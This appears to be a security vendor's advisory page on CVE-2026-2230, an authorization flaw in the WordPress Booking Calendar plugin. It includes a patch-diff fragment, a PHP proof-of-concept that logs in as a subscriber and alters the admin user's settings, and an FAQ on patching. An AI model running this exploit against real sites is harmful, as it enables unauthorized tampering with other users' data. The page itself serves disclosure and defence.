+				return (string) $bfb_pair['form']['content_form'];
+			}
+		}
+
+		return '';
+	}
+
+
+	/**
+	 * (Optional / future-proof) Parse BFB form_id stored inside booking form_data.
+	 *
+	 * Supported patterns:
+	 * - "wpbc_bfb_form_id{resource_id}^{ID}"
+	 * - "wpbc_bfb_form_id^{ID}"
+	 *
+	 * @param string $form_data
+	 * @param int    $resource_id
+	 *
+	 * @return int
+	 */
+	private static function get_bfb_form_id_from_form_data( $form_data, $resource_id ) {
+
+		$form_data   = (string) $form_data;
+		$resource_id = (int) $resource_id;
+
+		if ( '' === $form_data ) {
+			return 0;
+		}
+
+		$prefixes = array(
+			'wpbc_bfb_form_id' . $resource_id . '^',
+			'wpbc_bfb_form_id^',
+		);
+
+		foreach ( $prefixes as $prefix ) {
+
+			$pos = strpos( $form_data, $prefix );
+			if ( false === $pos ) {
+				continue;
+			}
+
+			$chunk = substr( $form_data, $pos + strlen( $prefix ) );
+
+			// Ends at "~" if present.
+			if ( false !== strpos( $chunk, '~' ) ) {
+				$chunk = substr( $chunk, 0, strpos( $chunk, '~' ) );
+			}
+
+			$chunk = trim( $chunk );
+			if ( '' === $chunk ) {
+				co

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-2230 - Booking Calendar <= 10.14.14 - Insecure Direct Object Reference to Authenticated (Subscriber+) Arbitrary User Settings Modification

<?php

$target_url = 'https://example.com/wp-admin/admin-ajax.php';
$username = 'subscriber';
$password = 'password';
$target_user_id = 1; // Admin user ID to target

// Step 1: Authenticate to WordPress
$login_url = str_replace('/wp-admin/admin-ajax.php', '/wp-login.php', $target_url);
$cookie_file = tempnam(sys_get_temp_dir(), 'cve_2026_2230_');

$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $login_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url,
        'testcookie' => '1'
    ]),
    CURLOPT_COOKIEJAR => $cookie_file,
    CURLOPT_COOKIEFILE => $cookie_file,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_SSL_VERIFYPEER => false
]);

$response = curl_exec($ch);

// Step 2: Extract nonce from booking settings page
$settings_url = str_replace('/wp-admin/admin-ajax.php', '/wp-admin/admin.php?page=wpbc-settings', $target_url);
curl_setopt_array($ch, [
    CURLOPT_URL => $settings_url,
    CURLOPT_POST => false,
    CURLOPT_HTTPGET => true
]);

$settings_page = curl_exec($ch);

// Extract nonce from page (simplified - actual implementation would parse HTML)
$nonce = 'extracted_nonce_here'; // Would be extracted via regex from settings_page

// Step 3: Exploit IDOR vulnerability
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'action' => 'wpbc_ajax_save_user_settings',
        'user_id' => $target_user_id, // Controlled parameter - change to target other users
        'settings_key' => 'booking_general_settings',
        'settings_value' => '{"calendar_view":"disabled","show_prices":false}',
        'nonce' => $nonce
    ])
]);

$exploit_response = curl_exec($ch);

// Check if exploit succeeded
if (strpos($exploit_response, 'success') !== false) {
    echo "[+] Successfully modified user $target_user_id settingsn";
    echo "Response: $exploit_responsen";
} else {
    echo "[-] Exploit failedn";
    echo "Response: $exploit_responsen";
}

curl_close($ch);
unlink($cookie_file);

?>

Frequently Asked Questions

What is CVE-2026-2230?
Overview of the vulnerability
CVE-2026-2230 is a vulnerability in the Booking Calendar plugin for WordPress that allows authenticated users with Subscriber-level access and above to modify other users’ settings. This is due to an Insecure Direct Object Reference (IDOR) in the handle_ajax_save function, which lacks proper validation.
How does CVE-2026-2230 work?
Mechanism of exploitation
The vulnerability allows attackers to send crafted AJAX requests to the admin-ajax.php endpoint, specifying arbitrary user IDs to modify settings. Since the function does not verify if the current user has permission to change the targeted user’s settings, this can lead to unauthorized modifications.
Who is affected by this vulnerability?
Identifying vulnerable users
All users of the Booking Calendar plugin versions up to and including 10.14.14 are affected. Specifically, authenticated users with Subscriber-level access and booking permissions granted by an Administrator can exploit this vulnerability.
How can I check if my site is vulnerable?
Steps for vulnerability assessment
To check if your site is vulnerable, verify the version of the Booking Calendar plugin you are using. If it is version 10.14.14 or earlier, your site is at risk. Additionally, review user roles and permissions to assess potential exposure.
How can I fix CVE-2026-2230?
Recommended actions
To fix this vulnerability, update the Booking Calendar plugin to version 10.14.15 or later, where the issue has been patched. Ensure that all users have appropriate permissions and review user roles to minimize exposure.
What does the CVSS score of 4.3 indicate?
Understanding severity ratings
A CVSS score of 4.3 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized access or data modification if exploited.
What are the practical risks of this vulnerability?
Impact on operations
The practical risks include unauthorized modifications to booking settings, which can disrupt the booking calendar functionality for targeted users. This may affect business operations by making the booking system unusable for specific users.
What does the proof of concept demonstrate?
Understanding the exploitation method
The proof of concept illustrates how an authenticated user can exploit the vulnerability by sending a crafted AJAX request to modify another user’s settings. It shows the steps involved in authentication and the manipulation of user IDs.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If immediate updating is not possible, consider restricting user permissions for Subscriber-level users or disabling the Booking Calendar plugin temporarily until a patch can be applied. Monitor user activities for any unauthorized changes.
Are there any long-term implications of this vulnerability?
Future considerations
Long-term implications include potential data integrity issues and user trust concerns if unauthorized modifications are made. Regularly updating plugins and reviewing user permissions are essential practices to mitigate future vulnerabilities.
How does the patch for CVE-2026-2230 work?
Details of the fix
The patch for CVE-2026-2230 adds proper authorization checks in the handle_ajax_save function. It ensures that the current user can only modify their own settings or has appropriate administrative privileges, preventing unauthorized changes.
What is Insecure Direct Object Reference (IDOR)?
Definition and context
Insecure Direct Object Reference (IDOR) is a type of security vulnerability that occurs when an application exposes a reference to an internal object, allowing attackers to access or modify data they should not have permission to. It often arises from insufficient authorization checks.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations